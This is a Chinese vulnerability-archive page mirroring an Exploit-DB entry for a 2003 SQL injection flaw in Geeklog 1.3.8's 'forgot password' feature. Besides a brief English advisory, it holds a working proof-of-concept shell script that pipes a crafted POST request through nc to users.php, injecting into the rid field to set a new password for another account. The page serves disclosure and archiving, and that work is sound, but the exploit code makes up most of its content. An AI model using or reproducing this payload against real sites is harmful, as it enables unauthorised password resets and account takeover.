Geeklog 1.3.8 – Forgot Password SQL Injection

16次阅读
没有评论

Geeklog 1.3.8 – Forgot Password SQL Injection

漏洞ID 1054229 漏洞类型
发布时间 2003-10-19 更新时间 2003-10-19
Geeklog 1.3.8 - Forgot Password SQL InjectionCVE编号 N/A
Geeklog 1.3.8 - Forgot Password SQL InjectionCNNVD-ID N/A
漏洞平台 PHP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/23260
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/8849/info

An SQL injection vulnerability has been reported in the Geeklog "forgot password" feature (introduced in Geeklog 1.3.8). Due to insufficient sanitization of user-supplied input, it is possible for remote attacks to influence database queries. This could result in compromise of the Geeklog installation or attacks against the database. 

------------->8------------->8------------->8------------->8--------------
#!/bin/sh

echo "POST /path/to/gl/users.php HTTP/1.0
Content-length: 50
Content-type: application/x-www-form-urlencoded

mode=setnewpwd&passwd=new&uid=2&rid=3'+or+uid='1&
" | nc localhost 80

------------->8------------->8------------->8------------->8--------------

相关推荐: Microsoft IIS HTTP Error Page Cross Site Scripting Vulnerability

Microsoft IIS HTTP Error Page Cross Site Scripting Vulnerability 漏洞ID 1102208 漏洞类型 Input Validation Error 发布时间 2002-04-10 更新时间 200…

正文完
 0